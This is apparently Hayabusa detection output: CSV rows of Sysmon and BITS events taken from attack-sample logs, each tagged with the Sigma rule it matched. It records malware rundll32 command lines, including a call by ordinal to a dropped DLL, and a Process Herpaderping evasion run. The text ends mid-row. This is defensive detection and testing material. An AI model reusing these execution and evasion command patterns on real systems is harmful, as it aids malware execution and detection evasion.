+00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\svchost.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 3420 | Src PGUID: 747F3D96-4790-5F93-0000-001054282200 | Tgt PID: 5864 | Tgt PGUID: 747F3D96-4694-5F93-0000-001092F70900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:17.176 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ? | LID: 0x8a619 | PID: 7552 | PGUID: 747F3D96-51F9-5F93-0000-001003125E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:17.176 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Activity,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:17.543 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: Rundll32.exe shell32.dll,Control_RunDLL C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 9116 | PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:17.543 +00:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:17.543 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\Rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7552 | Src PGUID: 747F3D96-51F9-5F93-0000-001003125E00 | Tgt PID: 9116 | Tgt PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:21.695 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 7504 | PGUID: 747F3D96-51FD-5F93-0000-00103B425E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:21.696 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 9116 | Src PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00 | Tgt PID: 7504 | Tgt PGUID: 747F3D96-51FD-5F93-0000-00103B425E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:22.066 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | LID: 0x8a619 | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:22.364 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\data.enc | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-23 21:58:22.391 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\config.xml | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx +2020-10-24 13:15:50.672 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 13:53:41.949 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 13:53:43.173 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 14:25:16.281 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 14:25:17.595 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 15:07:57.551 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 15:07:57.815 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-24 20:37:35.394 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-10-27 10:17:18.369 +00:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\samir.exe | Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | PID: 21756 | PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 10:17:18.369 +00:00,LAPTOP-JU4M3I0E,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 10:17:18.377 +00:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | Tgt Process: samir.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 21756 | Src PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418 | Tgt PID: 21048 | Tgt PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 10:17:18.397 +00:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: "".\samir.exe"" | Process: C:\Users\bouss\Downloads\samir.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe | LID: 0x1478dc6e | PID: 21048 | PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-10-27 10:17:18.397 +00:00,LAPTOP-JU4M3I0E,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx +2020-11-01 18:28:53.729 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-01 18:30:10.144 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-01 18:30:10.448 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-01 18:30:10.667 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-01 18:30:11.059 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-01 18:33:01.610 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 10:55:56.114 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe | URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 10:59:25.802 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 10:59:51.480 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 11:03:04.083 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 11:03:05.093 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 11:03:06.197 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 12:31:12.664 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 12:31:12.941 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 12:33:21.719 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 15:25:28.955 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-05 15:25:30.216 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 10:52:28.687 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-06 14:56:52.824 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-07 15:33:50.498 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-07 15:36:30.267 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-07 15:36:30.760 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 08:25:00.043 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 08:28:07.533 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 08:28:08.240 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 11:33:58.291 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 11:33:58.749 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 11:33:59.731 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 13:29:29.376 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-09 13:29:29.868 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 12:35:58.814 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-10 12:36:00.732 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 12:51:23.040 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 12:51:33.078 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.703 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.714 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.718 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.722 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.743 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.748 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.752 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.756 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.788 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx +2020-11-11 15:56:12.794 +00:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 